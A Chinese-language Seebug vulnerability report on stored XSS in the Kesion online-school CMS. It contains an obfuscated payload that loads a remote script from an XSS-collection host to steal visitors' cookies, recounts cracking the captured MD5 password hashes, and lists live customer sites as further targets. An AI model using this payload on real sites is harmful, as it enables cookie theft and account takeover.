科讯网校系统xss漏洞(密码为MD5加密)

2015-05-08T00:00:00
ID SSV:94909
Type seebug
Reporter Root
Modified 2015-05-08T00:00:00

Description

简要描述:

大CMS厂商。。 http://www.kesion.com/ 已有 469,628 个网站选择KESION产品搭建,今日新增网站 104 个 拿了好多证书。

详细说明:

首先在他们网站 http://e.kesion.com/model/view.aspx?m_id=3&id=4373 我目测只要有回复框就百分百存在这漏洞 而且全站判断的方式一样 为什么这样说呢 往下面看就知道了 http://e.kesion.com/model/view.aspx?m_id=3&id=4373 2014年司法考试历年真题课件-民法 OK 我们当然像二哥说的,不要见框就插,我们先试下,别那么着急插入js <img src="1" onerror=alert("1")> 提交看下

<img src="https://images.seebug.org/upload/201505/02233245c3a894a6ea6bd2225eca12165a5dea97.png" alt="1.png" width="600" onerror="javascript:errimg(this);">

那么知道了。。那么我们用Xss测试字符串转换工具转换下 然后把js转换, 插进去

&lt;img/src=http://www.baidu.com/img/baidu_sylogo1.gif onload=(function(){window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,120,115,115,46,104,97,99,107,116,97,115,107,46,110,101,116,47,75,48,84,79,97,115,63,49,52,51,48,53,55,57,52,52,50);document.body.appendChild(window.s)})()&gt;

然后获取到了cookie

<img src="https://images.seebug.org/upload/201505/0223322524ccf9f6b72896664bcf3a6574ca7a72.png" alt="2.png" width="600" onerror="javascript:errimg(this);">

平台看下

<img src="https://images.seebug.org/upload/201505/0223333579e98652a3c2548fe38ef93436fd4cbe.png" alt="3.png" width="600" onerror="javascript:errimg(this);">

这么弱智的加密。。自己还是个知名的cms,客户那么多,无语了。。 安全要注重丫,亲 拿到密码来:http://pmd5.com 解密 得到密码

<img src="https://images.seebug.org/upload/201505/022336194f730c7ef38b4ee30d843650946e43ff.png" alt="4.png" width="600" onerror="javascript:errimg(this);">

接下来他给出了几个比较大的案例,当然这是大的,我估计小的也是很多的。。他们签了好多合同了,我没必要多说啦。。 看他们的漏洞案例哈。

漏洞证明:

筑诚造价网校

弘智网校

http://www.hzwx.com/a/1141.aspx

其实案例全部加上 /ask 就进入问答社区了 然后你们懂得